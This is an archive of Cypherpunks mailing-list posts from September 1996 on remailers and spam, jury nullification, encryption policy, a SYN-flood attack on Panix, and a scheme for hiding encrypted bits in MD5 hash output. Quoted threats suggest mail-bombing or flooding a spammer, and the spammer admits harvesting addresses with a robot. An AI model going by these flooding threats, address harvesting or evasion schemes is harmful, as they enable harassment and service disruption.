If I put an "email to:" > > tag on a web site, I'm inviting "comment" on the information I've > > placed in public view > > A message sent to a MAILTO button on a WebPage, which contains the URL > of another WebPage is EXACTLY on-topic. It's my belief that any active > "webmistress" would be interested in what other sites have to offer. > > -- HTTP://www.HIPCRIME.com > From tcmay at got.net Fri Sep 13 00:57:43 1996 From: tcmay at got.net (Timothy C. May) Date: Fri, 13 Sep 1996 15:57:43 +0800 Subject: "Remailers can't afford to be choosy" Message-ID: I've picked the provocative title "Remailers can't afford to be choosy" so as to make an important point about remailers. First, a few responses to Rabid Wombat: At 3:26 AM 9/13/96, Rabid Wombat wrote: >Hormel, isn't it? Anyway, my point is that the law should not be involved >in it, but that it is going to be sucked in whether we like it or not if >social pressure is ineffective. What is, and is not "spam" has been Social pressure rarely works, of course. Canker and Sleazewell used the negative publicity about their spamming to sell more books. And the law rarely works, either. What _does_ work, throughout history, is technology. Locks on doors work where all the social pressure and all the legal measures fail. The SPAM situation has various parallels (and differences, of course). The point being argued in this latest thread, that "inappropriate" responses to a "mail me" button on a Web page have these parallels: * a contest operator announces a drawing based on forms filled out and deposited in a box, but neglects to check against multiple entries. One person "games against" the rules and submits 25,000 entries. The contest operator claims that this is fraud, or "contest SPAM," to coin a phrase. He splutters, "It's not fair! I assumed only one entry per person, even though I took no steps to ensure this. I want a law!" (Astute readers will recognize this situation from an early Heinlein novel.) 
* a radio station invites listeners to call in, then complains that one person is "calling too much." (A common situation with talk radio, and one best handled by screening callers. Even so, some of the same callers get through by using various disguised voices, etc. As with the contest situation, a problem best solved by the party involved, not the legal system.) * in general, any of several "over use of free or public resources." The bum who sits in a park, the kid who hangs out at the mall for several hours a day, the family who park themselves on the best fishing spot every weekend, etc. Again, these are not situations where I think either "social pressure" or "the law" works very well. Better solutions are to find ways to meter scarce resources. ... >We're therefore stuck - as a community, we cannot stop what many people >consider to be undesirable, as we cannot even define it, and the unwashed >masses will set governance upon us for our "own good." No, it is not hopeless. "Congestion pricing" is the operative phrase. Web sites that are too crowded can add capacity and increase advertising rates, or can charge admission, or the like. Remailers can (and will, sooner rather than later) charge "digital postage" for the service they are performing. (If nobody will pay, and the remailer network fizzles out, then clearly there was not an overall market, was there? I doubt that this is so, though at this early stage there is a lot of experimentation, subsidized sites, etc. Not an argument for laws, though.) >The ability to be anonymous on the 'net is generally a good >thing. It has allowed people access to information that might have >otherwise been denied them. It is an important freedom, and one that is >already in danger of being taken away through legislation (Georgia on my >mind ...). Abuse of this freedom by someone for purely commercial >purposes is certainly not going to help matters. _Lots_ of uses of remailers are "not going to help matters." So? 
Use of remailers to post the Homulka-Teale stuff was not well-received, use of remailers to post child porn is not well-received, use of remailers to bypass national security laws is not well-received. So? Remailer operators really, really, really have to get out of the business of looking at "what customers are using the remailers for" and then deciding to block senders, recipients, etc. based on what they see. I don't mean to minimize their concerns about illegal material being sent, about spamming, about insults and libelous stuff, etc., but it's important for all remailers to carefully think back to Chaumian mixes and what they mean. For one thing, there is no screening, no approval of content, etc. There might be digital postage, of course. And chaining, preferably. And encryption all the way through. Reread Chaum's original 1981 paper, the inspiration for our earliest thoughts about remailers. "Remailers can't afford to be choosy" >Note the earlier comment about someone being unhappy about their >"remailer-baby" being used for such a purpose - someone running a >remailer is generally doing so as a service, and is generally not >compensated for the equipment, time, energy, and aggravation. A lot of >remailers have shut down recently. Is this helping the cause of privacy >and free speech? Yes, actually. The shut-down of nonanonymous remailers is a good thing, ultimately. And the lessons of what happens when remailers become too well known (and hence nice fat targets for spammers, denial of service attackers, Churches, etc.) is also clear. By the way, today's remailers appear to be primarily _experiments_ or _casual services_, not altruistic services for some nebulous idea of "free speech." (Besides, if it's illegal for "spammers" to use remailers, so much for "free speech.") Digital postage is the ideal way to reduce the amount of "spam" flowing through a remailer site. 
The issue of "unwanted mail" is a more complicated issue, given our current "free to deliver" set up, and not one which directly involves the issue of remailers (except insofar as making it harder to track spammers down, but this is just the standard case with all crimes/etc. committed with remailers, and is a separable issue). >providor of web content as a courtesy to their readers. Why does it fall >to them to provide a completely off-topic forum for someone else's views? >How are they any different from members of a public mailing list? Must >the members of c'punks and toad.com accept all unpaid advertising in the >name of free speech? Absent rules or arrangements by the owners of the toad.com site, there is no legal recourse. And given the international nature of lists on the Internet, exactly which country's laws would be the operative ones? Would Poland request the extradition of a Brazilian who "spammed" via the Cypherpunks list, currently operating out of California? The mind boggles. Look to technoological/economic solutions as a first resort, not a last resort. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From unicorn at schloss.li Fri Sep 13 01:06:17 1996 From: unicorn at schloss.li (Black Unicorn) Date: Fri, 13 Sep 1996 16:06:17 +0800 Subject: Sen. Burns' statement on postponement of Crypto vote today. 
In-Reply-To: <199609122356.TAA01893@nrk.com>
Message-ID:

On Thu, 12 Sep 1996, David Lesher wrote:

> Robert Hettinga sez:
> > From: somebody
> > Administration in next two
> > weeks will unveil its "new and improved" encryption policy, which will likely
> > offer a shift in licensing to Commerce Dept., and gradual easing of
> > exportable strength, in exchange for industry-funded key escrow management
> > demo projects.
>
> I hear that the Feebs and DOJ are upset that they do not have enough
> pull in NSA/Commerce decisions; and wants to get in the middle of
> process. Industry is screaming over that.

Hogwash. James McAdams III in the Office of Intelligence Policy and Review is arguably the most influential intelligence policy official in the country. DoJ has plenty of say and to my knowledge they are not at all bitching.

>
> Of course, Feebs et.al have not legal standing in ITAR decisions, but
> that's not stopped 'em before....
>
>
>
> --
> A host is a host from coast to coast.................wb8foz at nrk.com
> & no one will talk to a host that's close........[v].(301) 56-LINUX
> Unless the host (that isn't close).........................pob 1433
> is busy, hung or dead....................................20915-1433
>

--
I hate lightning - finger for public key - Vote Monarchist
unicorn at schloss.li

From bdavis at thepoint.net Fri Sep 13 01:07:20 1996
From: bdavis at thepoint.net (Brian Davis)
Date: Fri, 13 Sep 1996 16:07:20 +0800
Subject: jury nullification/selection
In-Reply-To: <2.2.32.19960912075929.00691470@pop.ricochet.net>
Message-ID:

On Thu, 12 Sep 1996, Greg Broiles wrote:

>
> Sorry if I was too terse earlier. I hadn't intended to start a big FIJA dustup.
> > I think that government sleaziness is not only useful in a true > nullification argument ("he's guilty but you should acquit anyway") but Certainly, the nullification argument can be used in the "send the government a message" sense, but it is more likely to be successful IMO in a "poor, poor pitiful me" argument. > where it reflects on the credibility of testimony and the prosecution's case > in general. It's easy to imagine a prosecution which rests on the testimony > of people who lie every day (criminally involved informants, jailhouse > informants, and undercover cops) and/or real evidence which was gained > through the use of subterfuge and trickery (like wiretap/body wire > evidence). The idea is to make the government look sleazier and trickier > than the defendant(s) and the defense witnesses. If the government's > evidence ends up being tainted directly or indirectly by lying, trickery, > etc., then the defense can argue "Hey. You can't trust anyone who got up on > that stand and talked to you. And if you don't know who to trust and you > think everyone's lying, the government's got no case. And if they've got no > case, the judge will tell you that you must acquit." This happens in most criminal trials in my area to at least some extent and to an ever greater degree in drug prosecutions (more material ...). :-) > So I think that public distaste and discomfort with weirder and sleazier > tactics on the part of cops can be (and is) discussed and used and "voted You need to know who is on your jury. Many goverment employees, retirees, and housewives (who frequently populate juries) are at least as likely to not care what the cops did while looking at, say, a young black male defendant charged with distributing drugs. > on". "Not guilty" doesn't necessarily mean "innocent", sometimes it means > "The prosecution didn't have enough evidence I thought I could trust." Not Guilty *never* means innocent. 
It means not proven guilty beyond a reasonable doubt (or "we nullified"). > And yes, I agree that even mentioning nullification during voir dire will > probably get you kicked off of a jury; and I think that's partly because one > party or the other will be scared of nullification, and partly because the > term "jury nullification" makes people think of FIJA and associated loons. > Nobody wants a loon on the jury. (I don't think everyone who argues for > nullification is a loon, but some of them sure are - and there's no good way > to figure out whether someone's a loon or not in the middle of jury selection.) > > And I also agree that the jury selection process tends to select away from a > true cross-section of society; but the few easily available examples (big > trials like OJ or the Menendez Bros. or Wm. Kennedy Smith or whoever) are > poor examples because they're not typical. Trials where lots is at stake Especially because $$$ is available to hire jury experts, do a summary mock jury trial to test theories out, and have a shadow jury. > (death penalty or celebrity defendant or big $ civil trials) tend to have > longer processes (which weed out everyone who isn't incredibly boring) but > it's not at all uncommon to pick a jury in a morning or in a day or two. In My personal record in a federal criminal case is four hours -- from jury selection to verdict. The defendant later threatened to kill his lawyer, the probation officer, the judge and ... me. > federal court, the judge usually questions the jury instead of the attorneys > (which is faster), and may or may not ask questions that the attorneys have > suggested. Also, sometimes one side or the other will *want* especially > analytical or technical or well-trained jurors. Attorneys want to pick a > jury they can persuade, but they also want to pick a jury that can > understand their theory of the case. 
> > So I guess my point is that while the jury system isn't perfect, it is in > some ways a much more direct way to "vote" on how things work in the > judicial and law enforcement systems. I think it's more immediately and > directly democratic than the electoral system. All of the legal bullshit > aside, it's possible to think about trials as a way for people who have some > sort of problem (they've been injured or accused of a crime or whatever) to > tell a group of uninvolved people about the problem and ask them what the > right thing to do is. Yeah, that's really oversimplified, but I think that > what juries do is important and that what they do has a political and a > moral dimension even if attorneys aren't supposed to talk about it during > argument. Roger that. The first case I ever tried, I lost. I was very unhappy. But the victim was quite pleased. She felt that she had the opportunity to say what she had to say ... let it all out ... and everything was fine. There is some value in "reverse allocution." EBD > -- > Greg Broiles | "We pretend to be their friends, > gbroiles at netbox.com | but they fuck with our heads." > http://www.io.com/~gbroiles | > | > > From gbroiles at netbox.com Fri Sep 13 01:09:33 1996 From: gbroiles at netbox.com (Greg Broiles) Date: Fri, 13 Sep 1996 16:09:33 +0800 Subject: Fed appellate judge remarks re anonymity, free speech on the net Message-ID: <2.2.32.19960913060631.006bf908@pop.ricochet.net> At 09:24 PM 9/12/96 -0700, zachb at netcom.com wrote: >> (Also in today's news, the 9th Circuit upheld a CA statute forbidding sales >> of material considered "harmful to minors" from vending machines.) > >Even if this statute is meant only to apply to cigarette machines, which >would seem to be the case given all of the anti-cig stuff going on now, >what good will it do? Whoops. Sorry. Wrong context. 
What I should have said was "the 9th Circuit upheld a CA statute forbidding sales of *printed* material considered 'harmful to minors' from unsupervised vending machines". The publication(s) at issue are those newsprint swingers' magazines (e.g., "me and my friend want to screw you and your friend. here is a picture of us naked."). (doh!) -- Greg Broiles | "We pretend to be their friends, gbroiles at netbox.com | but they fuck with our heads." http://www.io.com/~gbroiles | | From jf_avon at citenet.net Fri Sep 13 01:15:46 1996 From: jf_avon at citenet.net (Jean-Francois Avon) Date: Fri, 13 Sep 1996 16:15:46 +0800 Subject: Nonsense, absolute nonsense... [Fwd: HipCrime and Spam] Message-ID: <9609130432.AA09422@cti02.citenet.net> On 12 Sep 96 at 20:03, Rabid Wombat replied to a spammer with an Attila the Hun (looter and plunderer) mentality: > > > However, since others may think like you, I guess I'll have to > > > add a line above my link stating that email not related to the > > > purpose of my site will be happily proof-read at the rate of > > > $200 per hour, The looter speaking here: > > How can you hope to > > enforce it? It's a joke, right? :) Maybe not, since it's on your > > sig-line. that is one of their way of seing life: as long as you have the physical means to perform an action and that nobody else can stop you, you can do it. > > A website is > > an open invitation to comment and e-mail. Again, he doesn't ask himself why the page, put into existence (most of the time by the good will of the creator and owner of the account, paying out of his own pocket from his own work) does not bear the mention: "we invite spam" > > Better password your > > site if you want to solve this problem. "Civilisation, is the transition from a public society to a society of privacy" (approximate quote from Ayn Rand). We have laws that hope to accomplish that, i.e. trying to set men free from other mens. 
Passwording is like putting a lock on a door: to prevent intrusion from peoples that have different values. Note that the trespassing is *always* done in favor of the looters at the expense of the producers. > > Then no-one can visit it, > > and no-one can send out a spider to get your e-mail address. > > That's what I do, send out a robot to bring back e-mail addresses. > > Of course I only send to makers of software, and my product > > applys to their world. I'm glad the tresspasser limits the field of his victims. > Comment is one thing. Mass junk mail is another. I'd view "comment" > as expressing an opinion. If I put an "email to:" tag on a web site, > I'm inviting "comment" on the information I've placed in public view > - there's reasonable expectation that the "comment" will be > pertinent, even if it is only "Your automated gif sucks." This isn't > quite the same as inviting completely irrelevent junk mail, and I > still fail to see how you make this leap of logic. He does it very simply: by blanking out the nature of his acts. Only, there is no logic in this act, only feelings. > You are on a public mailing list, aren't you? You have some degree > of expectation as to the pertinence of topics discussed on said > list, don't you? Even if it is c'punks? The same holds true for > newsgroups. The vast majority of 'net users dislike off-topic > discussion; they subscribe to mailing lists and newsgroups to > discuss topics of relevence and mutual interest. > It is highly > self-centered of you to assume the "right" to waste their time with > unwanted and completely off-topic communication. No, it is not self-centered at all, it is only done on the impulsion of the moment. If he were smart, he would realize that reputation takes years to build and seconds to destroy. > > If you don't want spam in your mail box: > > > > 1. 
Don't have a website or don't put your e-mail address on your > > website If you don't want to get mugged, don't walk in the street; if you don't want to get killed by a mugger, chase him and offer him you wallet, then kill yourself. I grew in an extended family where there was always money and wallets on the kitchen table. But no matter how broke one of us were, if it did not belong to him, he did not take it. It is, of course, out of respect for life (and it's economic extension, the right to property) > > 2. Don't post to newsgroups Don't exists... ( because to him, the use of force is legitimate and there is no such right as the right to live, as long as he's got stronger arms than yours) > > 3. Don't post to mailing lists Ditto > > 4. If you post do so anonymously Act covertly, Live in fear. > When you exercise your "right" to free speech to the extent that you > piss off a large segment of society, society will react by reducing > its measure of freedom of speech. I won't start a discussion here. I will simply state that words have a definite meaning and that by twisting them (I suppose innocently in your case), you give them a moral sanction. jfa Jean-Francois Avon, Montreal QC Canada "One of theses centuries, the brutes, private or public, who believe that they can rule their betters by force, will learn the lesson of what happens when brute force encounters mind and force." - Ragnar Danneskjold PGP key at: http://w3.citenet.net/users/jf_avon ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 From mcw at hpato.aus.hp.com Fri Sep 13 01:16:02 1996 From: mcw at hpato.aus.hp.com (M C Wong) Date: Fri, 13 Sep 1996 16:16:02 +0800 Subject: PANIX.COM down: denial of service attack In-Reply-To: <2.2.32.19960912182630.008b6324@panix.com> Message-ID: <199609130334.AA161125684@relay.hp.com> > Here are the gory details from the first MOTD last Saturday: > The attacker is forging random source addresses on his > packets, so there is no way to find his/her location. 
There > is also no way to screen out those packets with a simple > router filter. > This is probably the most deadly type of denial-of-service > attack possible. There is no easy or quick way of dealing > with it. If it continues into Saturday we will start working > on kernel modifications to try to absorb the damage > (since there's absolutely no way to avoid it). This > however will not be an easy job and it could take days to > get done (and get done right). > For those who are IP hackers, the problem is that we're > being flooded with SYNs from random IP addresses on > our smtp ports. We are getting on average 150 packets ^^^^ Can't access to this port be guarded against by a filtering router which is configured to accept *only* a number of trusted MX hosts ? That is the target itself *never* permits any incoming traffic to smtp port *not* in the list of trusted MX hosts, which does buffering for the target ? Info on such MX hosts be hidden from secured way of DNS setup so attacker will not learn about the MX hosts easily. In case on MX host get flooded, there will be at least one backup host to take over to prevent a total D.O.S. > Since then the packet streams have hit almost all the ports for news, www, > telnet, etc. > DCF -- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ M.C Wong Email: mcw at hpato.aus.hp.com Australian Telecom Operation Voice: +61 3 9210 5568 Hewlett-Packard Australia Ltd Fax: +61 3 9210 5550 P.O. Box 221, Blackburn 3130, Australia From roy at sendai.scytale.com Fri Sep 13 01:44:54 1996 From: roy at sendai.scytale.com (Roy M. 
Silvernail)
Date: Fri, 13 Sep 1996 16:44:54 +0800
Subject: mailing lists
In-Reply-To: <3238648F.207@precipice.v-site.net>
Message-ID: <960913.002423.7Q6.rnr.w165w@sendai.scytale.com>

-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, robert at precipice.v-site.net writes:

> Why not put your money where your mouth is, and bet me (any amount),
> that spam WILL be socially acceptable by the year 2000. Particularly,
> when the green-folks discover how many trees will be saved. It'll be
> a social-mandate, NOT just a suggestion. Want to bet?

Bryce had a great idea when he suggested a mail filter with a $1 ecash deposit required for first contact. It would certainly help out when people who Don't Get It start to misbehave.

- --
Roy M. Silvernail [ ] roy at scytale.com
PGP Public Key fingerprint = 31 86 EC B9 DB 76 A7 54 13 0B 6A 6B CC 09 18 B6
Key available from pubkey at scytale.com

From robert at precipice.V-site.net Fri Sep 13 01:46:04 1996
From: robert at precipice.V-site.net (HipCrime)
Date: Fri, 13 Sep 1996 16:46:04 +0800
Subject: No Subject
Message-ID: <3238FD6C.5CB7@precipice.v-site.net>

Here's a collection of your various threats:

> I suspect you may soon be hearing from far worse than I ...

> Some punks take their colors seriously.

> Congratulations. I had at first thought you were a simple fool.
> Now I'm certain you're an idiot.

> Sounds to me like every remailer can legally be altered to send a
> small message to hipcrime every time it processes any messages.

> if anyone's got a T3 handy, you could always take the direct approach.

In making these threats, you've mistaken me for someone who cares. Someone who cares what you send to my box.
I'm actually, and in fact, homeless in real life. Yes, both an "idiot" and a "simple fool": your compliments in my book. My only equipment is access to friends' computers, and a free dialup that the big-hearted SysOp at V-Site gives me. (By the way, you've been merciless to him). In view of this fact: Do you think that even 1,000,000 messages into my stupid electronic mailbox would matter? Some nights my worries are of a place to sleep, not how many messages will accumulate during my slumber. CypherPunks live so far from real-life, that it's impossible for them to communicate rationally. Never having any danger in their lives, they want to avoid encountering any in "cyberspace". They are trying to craft that new world according to their intellectual guidelines. Trying to make sure real-world annoyances have been removed. This is what HipCrime's real offense was: providing a piece of unexpected (ok,ok "unwanted", if you prefer) stimulus. Only a single one. A tiny-little URL, but sent without warning, anonymously, and pointing to a strange site. Since I've UNSUBSCRIBED from your CypherWimps mailing list, and still receive your messages (two copies, the one you send me, and the one you send the list), my only conclusion is that Email is your only social discourse. Take notice that after this, all future messages from y'all will feel the power of the DELETE button (unread and barely noticed). Think of how easy it is to move around in "cyberspace". Do this math: 1,000,000 messages = 1 new domain + 1 new mailbox. In this argument you win, junk Email is SPAM ... but junk SnailMail is THIN SLICES CUT FROM OUR PRECIOUS FORESTS. -- HTTP://www.HIPCRIME.com From bdavis at thepoint.net Fri Sep 13 01:49:12 1996 From: bdavis at thepoint.net (Brian Davis) Date: Fri, 13 Sep 1996 16:49:12 +0800 Subject: Jury Nullification = Voting One's Conscience In-Reply-To: Message-ID: On Wed, 11 Sep 1996, Timothy C. 
May wrote: > At 9:18 PM 9/11/96, Brian Davis wrote: > >On Wed, 11 Sep 1996, jonathon wrote: > >> On Wed, 11 Sep 1996, Gary Howland wrote: > >> > >> > > But the public *is* asked to assent to those methods - your chance > >>to vote > >> > > on them is known colloquially as "jury duty". > >> But judges have said that Jury Nullification is not acceptable > >> legal practice. > > > >And other judges have said the opposite. > > And I don't think there has _ever_ been a case of a juror prosecuted/jailed > for voting his or her conscience, regardless of jury instructions. Short of > explicitly selling one's vote, or discussing the case during deliberations > with outsiders (and probably not even then), one is essentially free to > vote one's conscience (however foolishly, as the O.J. case showed). Agreed. A petit jury is when citizens have the right and power to do what they will. Juries are supposed to judge the facts and, if they don't believe a fact necessary for one side to win, then the other side wins. But that's not the end of it: Lawyers play on jurors' sympathies all the time -- spouse and kids in the front row (crying), "mentioning" a defendant's extensive medical problems, etc. The jury can accept these or not. Occasionally, a jury will buy into some of that and the judge will be so disgusted at what *he* sees as an injustice, that he will lecture the jury before dismissing them. Yes, jurors swear an oath to follow the law as the judge gives it to them, but jury nullification is well-established in Anglo-American jurisprudence. One of my local federal district judges seriously considered instructing the jury on its "right to nullify" at the close of the case. Obviously, he didn't care for that particular prosecution. It wasn't my case, so I don't know if he ultimately instructed the jury on nullification, but I know the prosecutor was running around the library, looking for ammo to use in his argument against the instruction. 
And yes, in an appropriate case, I can see myself asking the judge for such an instruction -- and I see myself, in effect, arguing it in closing in many more cases.

>
> And the principle is a good one: jurors should not have to fear prosecution
> for voting their consciences, regardless of technical details imposed by a
> judge. And, of course, jurors are not required to give a court their
> "reasons" for voting as they do.
>
> Though I often condemn aspects of the American political and legal system,
> it is true that an awful lot of things are done right.

Perhaps, like democracy, it is the worst system possible, except for every other system man has invented.

EBD

> --Tim May, who served _once_ on a jury (for a speeding case) in 1973, who
> was called once since then, but not actually called for a jury. (I vote
> every election, I am duly registered with the DMV, so I wonder why I have
> only served once in 24+ years of eligibility.)
....

From jim at suite.suite.com Fri Sep 13 01:51:08 1996
From: jim at suite.suite.com (Jim Miller)
Date: Fri, 13 Sep 1996 16:51:08 +0800
Subject: really undetectable crypto
Message-ID: <9609130234.AA06200@suite.com>

Most everybody on the list is familiar with the technique of hiding encrypted messages in the LSBs of image files. Personally, I would not use such a technique because I don't believe it's really undetectable. I assume, without proof, that the LSBs of image files have statistical properties that are sufficiently different from encrypted data that a clever person could determine whether or not an image file contained an imbedded encrypted message.

Fortunately, there are other steganographic techniques that, I believe, are undetectable. The trick is to hide your encrypted bits in other encrypted bits.

trick #1) Let's say you want to send a short encrypted message via a communications channel that only allows cleartext messages with optional MD5 message hashes.
You can construct cleartext messages, via trial-and-error, such that the first 4 or 8 bits (or more, if you have the time) of the MD5 hash match the first 4 or 8 bits of your encrypted message.

You can pre-compute all the required cleartext messages in advance, and then send them one after another. The recipient of the cleartext messages can reconstruct the encrypted message by gathering together the first 4 or 8 bits of each MD5 hash.

Since the bits in an MD5 message hash are presumably cryptographically random, there should be no way to tell if some of the bits combine to make an encrypted message.

trick #2) Let's say you are allowed to use 40 bit encryption, but nothing stronger. As in trick #1, you can pre-compute plaintext messages such that the first 4 or 8 of the bits in the output of the government-approved 40 bit encrypted data match the first 4 or 8 bits of your hidden encrypted message.

trick #n) see above.

Any communications channel that allows you to send *any* bits that are cryptographically random can be used to send arbitrary encrypted messages.

Jim_Miller at suite.com

P.S. The pre-computed plaintext messages don't have to be garbage messages. You can probably make an innocent-looking message produce the desired bits by adding extra whitespace or typos.

From jimbell at pacifier.com Fri Sep 13 01:54:49 1996
From: jimbell at pacifier.com (jim bell)
Date: Fri, 13 Sep 1996 16:54:49 +0800
Subject: Fed appellate judge remarks re anonymity, free speech on the net
Message-ID: <199609130236.TAA22049@mail.pacifier.com>

At 05:40 PM 9/12/96 -0700, Greg Broiles wrote:
>
>The Daily Journal, a LA/SF legal newspaper had an article today (9/12) about
>a lunchtime address given by Ninth Circuit Judge Alex Kozinski last Monday
>at an Internet Law Symposium in Seattle.
>
>The article quotes Kozinski as saying "I have a severe problem with
>anonymous E-mailers . . . You don't have a right to walk up to somebody's
>door and knock with a bag over your head."
The article says Kozinski likened >anonymous E-mail to menacing someone. I wish somebody would go up to these guys and point out that since the Internet is, more or less, a huge, worldwide, VOLUNTARY association of people, _we_ don't think these judges have any sort of "right" to regulate its content. Furthermore, it isn't clear that the proper regulators of the Internet shouldn't be an entirely different set of people selected by Internet users, RATHER than the same old government system that's managed to screw up the rest of the world so far. And if you're looking for "menacing," I'd say that describes the government's behavior towards the Internet over the last year or two. >Kozinski also suggested that computer-generated or morphed images of >children involved in sexual acts may not be protected under the Constitution >because of ongoing trauma to the child, Which child? Does he understand what "computer-generated" means? >while computer-generated or morphed images of adults would be protected. What about the "ongoing trauma" to the adults? I smell hypocrisy. >The article says that Kozinski was skeptical that he or other federal judges >necessarily agreed with the 3rd Circuit's ruling in _ACLU v. Reno_ (finding >the CDA unconstitutional). > >Kozinski is considered relatively conservative and relatively libertarian, >as 9th Circuit judges go. Which means that he'll last just a little longer "when the cyber-revolution comes." Jim Bell jimbell at pacifier.com From tomw at netscape.com Fri Sep 13 01:57:27 1996 From: tomw at netscape.com (Tom Weinstein) Date: Fri, 13 Sep 1996 16:57:27 +0800 Subject: [Long] A history of Netscape/MSIE problems In-Reply-To: <517brn$lu7@life.ai.mit.edu> Message-ID: <32390335.6231@netscape.com> Hallam-Baker wrote: > > There was a long list of security holes in SSL, PCT plugged a good > number of them and SSL v3 plugged a few. This statement surprises me. It appears to mean that you think PCT has fewer holes than SSL 3.0. 
If you know of any holes in SSL 3.0, I'd be very interested in hearing about them. -- You should only break rules of style if you can | Tom Weinstein coherently explain what you gain by so doing. | tomw at netscape.com From wombat at mcfeely.bsfs.org Fri Sep 13 01:57:50 1996 From: wombat at mcfeely.bsfs.org (Rabid Wombat) Date: Fri, 13 Sep 1996 16:57:50 +0800 Subject: "Unwanted Mail" In-Reply-To: Message-ID: On Thu, 12 Sep 1996, Timothy C. May wrote: > At 9:48 PM 9/12/96, Rabid Wombat wrote: > >> > >> These people have invited the email, and the associated expense, by placing > >> a public email-to: button on their public www page. > > > > > >Most people put up an "email to:" button on a public page for > >communications related to what's on the page. It's quite a stretch to > >assume that this invites any and all email from anyone who cares to send > >whatever they want. I can't say I've ever seen one that said "Please send > >SPAM(tm) to:" ... > > But to attempt to define "SPAM" (unless you're Armour) is dangerous. This > whole notion of "unwanted mail" is ill-defined and not something "the law" > should get involved in, in my view. (And CP technologies certainly are > consistent with this, e.g., placing the role of screening on those who set > up gates, not on tracking down True Names for prosecution.) > Hormel, isn't it? Anyway, my point is that the law should not be involved in it, but that it is going to be sucked in whether we like it or not if social pressure is ineffective. What is, and is not "spam" has been debated on usenet since the dawn of 'net time. While most newsgroup members agree that traffic should stay more or less "on topic", few can agree to just what "on topic" is. Sorta like the "Pornagraphy Definition" of "I can't define it, but I know it when I see it" being entirely a matter of one's own present and subjective opinion, and therefore impossible to codify. 
We're therefore stuck - as a community, we cannot stop what many people consider to be undesirable, as we cannot even define it, and the unwashed masses will set governance upon us for our "own good." The community does try to prevent this undesirable sort of communication; many people will take it upon themselves to complain to the originator of the "mass mailing", and, if that fails, to the ISP providing connectivity. When the "mass mailing" is posted through a remailer, this becomes somewhat more difficult. The ability to be anonymous on the 'net is generally a good thing. It has allowed people access to information that might have otherwise been denied them. It is an important freedom, and one that is already in danger of being taken away through legislation (Georgia on my mind ...). Abuse of this freedom by someone for purely commercial purposes is certainly not going to help matters. Note the earlier comment about someone being unhappy about their "remailer-baby" being used for such a purpose - someone running a remailer is generally doing so as a service, and is generally not compensated for the equipment, time, energy, and aggravation. A lot of remailers have shut down recently. Is this helping the cause of privacy and free speech? I have no complaint against anyone voicing their opinion, and defend their right to do so. However, I don't agree that a different set of standards somehow applies to those who provide a means to contact the providor of web content as a courtesy to their readers. Why does it fall to them to provide a completely off-topic forum for someone else's views? How are they any different from members of a public mailing list? Must the members of c'punks and toad.com accept all unpaid advertising in the name of free speech? 
> >However, since others may think like you, I guess I'll have to add a line > >above my link stating that email not related to the purpose of my site > >will be happily proof-read at the rate of $200 per hour, 1 hour per 60 > >lines, minimum. Perhaps I'll get lucky. If I get a big enough chunk of > >SPAM(tm), it might be worth the costs of breaking down the anonymity. > > As the legal eagles will tell you, the essence of a contract is a two-way > agreed upon set of terms, not a one-way "if you send me mail I decide I > don't want, you will have incurred a charge of $1000." Try enforcing your > $200 an hour "proofreading charge" in any court in the land. Sarcasm, Tim. I really wouldn't expect this to work, and doubt anyone else would. Just trying to point out that when all else fails, our society generally pursues resolution through the courts (could be worse, I suppose, but I for one think we are far too prone to this - OTOH, we seem to have slipped from "right" to "legally defensible" somewhere back there). > > (I've been saying this thing for several years. Who knows, maybe Rabit > Wombat was the first to use it. Whatever, it's as unenforceable and > meaningless now as it was several years ago.) > Yes, it is meaningless, legally. It was not meant to be taken seriously, any more than the "dead skunks" were. Where the hell would I get 100 dead skunks at this time of the night? I don't even know if I have that much ammo left over from last weekend. > >No, this b.s. is more like having someone put a dead skunk in my mailbox, > >with no return address, trying to prevent me from sending them 100 dead > >skunks as a return favor. And about as welcome. > > In the case of actual USPS mailboxes, there are laws which prevent others > from using them (e.g., no UPS or FedEx deliveries). For sure, dead skunks > can be placed in mailboxes, or under porches, or whatever. The law can't > fix everything. No, and it ought to be the last resort. - r.w. 
From asgaard at Cor.sos.sll.se Fri Sep 13 08:50:24 1996 From: asgaard at Cor.sos.sll.se (Asgaard) Date: Fri, 13 Sep 1996 23:50:24 +0800 Subject: 56 kbps modems Message-ID: >U.S. Robotics and Rockwell International are planning new modems with >speeds up to 56 kbps a second, almost double the speed of the fastest >rate now available. The new devices should be available by the end of >the year, although their top speed initially may be less than 56 kbps. >(Wall Street Journal 12 Sep 96 B11) People who seemed to know used to say that 'the Shannon limit' set an absolute upper limit around 40 kbps. Has Shannon been proven wrong, or what? Asgaard From gary at systemics.com Fri Sep 13 09:06:36 1996 From: gary at systemics.com (Gary Howland) Date: Sat, 14 Sep 1996 00:06:36 +0800 Subject: What is this nonsense? (Anti DVD piracy chip) In-Reply-To: <960913.002423.7Q6.rnr.w165w@sendai.scytale.com> Message-ID: <323950B0.167EB0E7@systemics.com> Taken from a recent Edupage: > SGS-THOMSON TAKES AIM AT DVD PIRACY > SGS-Thomson Microelectronics has developed a computer chip that prevents > would-be DVD pirates from making unlawful copies of movies from digital > video disc players. The chip scrambles the disk's coding if it's duplicated > on a VCR. (Investor's Business Daily 11 Sep 96 A6) Anyone know anything about this? Sounds like nonsense to me ... Gary -- "Of course the US Constitution isn't perfect; but it's a lot better than what we have now." -- Unknown. pub 1024/C001D00D 1996/01/22 Gary Howland Key fingerprint = 0C FB 60 61 4D 3B 24 7D 1C 89 1D BE 1F EE 09 06 From jya at pipeline.com Fri Sep 13 10:18:53 1996 From: jya at pipeline.com (John Young) Date: Sat, 14 Sep 1996 01:18:53 +0800 Subject: 260_0it Message-ID: <199609131302.NAA16956@pipe1.t1.usa.pipeline.com> 9-13-96. WaJo: "Magazine's Recipes For Hackers' Havoc: Warning or Weapon?" Whoever attacked Panix could have found guide in latest issue of 2600. 
